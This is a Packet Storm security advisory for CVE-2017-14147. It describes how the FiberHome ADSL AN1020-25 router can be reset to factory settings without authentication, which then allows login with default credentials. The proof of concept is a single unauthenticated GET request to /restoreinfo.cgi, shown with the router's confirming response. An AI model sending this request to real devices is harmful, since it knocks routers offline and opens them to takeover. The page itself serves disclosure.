Twenty Year Anniversary

FiberHome Unauthenticated ADSL Router Factory Reset

FiberHome Unauthenticated ADSL Router Factory Reset
Posted Sep 6, 2017
Authored by Ibad Shah

FiberHome suffers from an unauthenticated ADSL router factory reset vulnerability.

tags | exploit, bypass
advisories | CVE-2017-14147
MD5 | 1f1aebe9984030ffad3264aab7615426

FiberHome Unauthenticated ADSL Router Factory Reset

Change Mirror Download
Title:
====

FiberHome Unauthenticated ADSL Router Factory Reset.

Credit:
======

Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io


CVE:
=====

CVE-2017-14147

Date:
====

05-09-2017 (dd/mm/yyyy)

About FiberHome:
======

FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.

Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices

URL : http://www.fiberhomegroup.com/


Description:
=======

This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.



Affected Device Model:
=============

FiberHome ADSL AN1020-25


Exploitation-Technique:
===================

Remote


Details:
=======

Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.

1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147

Vulnerable restoreinfo.cgi



Proof Of Concept:
================

PoC :

GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close


HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close

<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide

function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';

if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}

eval(code);
}

function frmLoad() {
setTimeout("restore()", 60000);
}

// done hiding -->
</script>
</head>

<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>



Credits:
=======

Ibad Shah, Taimooor Zafar, Owais Mehtab

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

July 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    1 Files
  • 2
    Jul 2nd
    26 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    11 Files
  • 5
    Jul 5th
    13 Files
  • 6
    Jul 6th
    4 Files
  • 7
    Jul 7th
    4 Files
  • 8
    Jul 8th
    1 Files
  • 9
    Jul 9th
    16 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    32 Files
  • 12
    Jul 12th
    22 Files
  • 13
    Jul 13th
    15 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    1 Files
  • 16
    Jul 16th
    21 Files
  • 17
    Jul 17th
    15 Files
  • 18
    Jul 18th
    15 Files
  • 19
    Jul 19th
    11 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close